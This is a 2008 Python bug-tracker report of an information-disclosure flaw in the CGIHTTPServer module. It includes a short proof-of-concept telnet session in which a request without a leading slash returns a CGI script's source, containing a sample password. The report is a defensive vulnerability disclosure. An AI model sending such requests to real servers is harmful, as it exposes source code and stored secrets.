[New-bugs-announce] [issue2254] Python CGIHTTPServer information disclosure

sumar report at bugs.python.org
Fri Mar 7 20:59:45 CET 2008 

New submission from sumar:

================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================

----------
components: Library (Lib)
messages: 63361
nosy: m.sucajtys
severity: normal
status: open
title: Python CGIHTTPServer information disclosure
type: security
versions: Python 2.5

__________________________________
Tracker <report at bugs.python.org>
<http://bugs.python.org/issue2254>
__________________________________

More information about the New-bugs-announce mailing list